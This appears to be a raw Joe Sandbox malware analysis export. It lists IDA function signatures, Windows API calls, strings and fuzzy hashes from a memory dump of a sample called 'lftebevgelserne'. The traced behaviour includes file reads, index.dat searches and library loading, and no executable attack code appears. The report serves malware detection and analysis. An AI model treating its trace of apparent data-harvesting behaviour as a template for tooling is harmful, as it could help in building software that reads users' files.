                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$File$PointerRead
                                                      • String ID:
                                                      • API String ID: 839530781-0
                                                      • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                      • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID: *.*$index.dat
                                                      • API String ID: 1974802433-2863569691
                                                      • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                      • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$FilePointer
                                                      • String ID:
                                                      • API String ID: 1156039329-0
                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                      • String ID:
                                                      • API String ID: 1125800050-0
                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                      APIs
                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleSleep
                                                      • String ID: }A
                                                      • API String ID: 252777609-2138825249
                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                      APIs
                                                      • malloc.MSVCRT ref: 00409A10
                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                      • free.MSVCRT ref: 00409A31
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: freemallocmemcpy
                                                      • String ID:
                                                      • API String ID: 3056473165-0
                                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                      • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: BINARY
                                                      • API String ID: 2221118986-907554435
                                                      • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                      • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: /stext
                                                      • API String ID: 2081463915-3817206916
                                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: .Wu
                                                      • API String ID: 2081463915-3424199868
                                                      • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                      • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                      APIs
                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 2445788494-0
                                                      • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                      • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                      APIs
                                                      Strings
                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: malloc
                                                      • String ID: failed to allocate %u bytes of memory
                                                      • API String ID: 2803490479-1168259600
                                                      • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                      • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                      • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                      • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                      APIs
                                                      • memset.MSVCRT ref: 0041BDDF
                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcmpmemset
                                                      • String ID:
                                                      • API String ID: 1065087418-0
                                                      • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                      • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                      APIs
                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                      • String ID:
                                                      • API String ID: 1381354015-0
                                                      • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                      • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                      APIs
                                                      • memset.MSVCRT ref: 004301AD
                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID:
                                                      • API String ID: 1297977491-0
                                                      • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                      • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                      APIs
                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                      • String ID:
                                                      • API String ID: 2154303073-0
                                                      • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                      • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                      APIs
                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 3150196962-0
                                                      • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                      • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                      APIs
                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$PointerRead
                                                      • String ID:
                                                      • API String ID: 3154509469-0
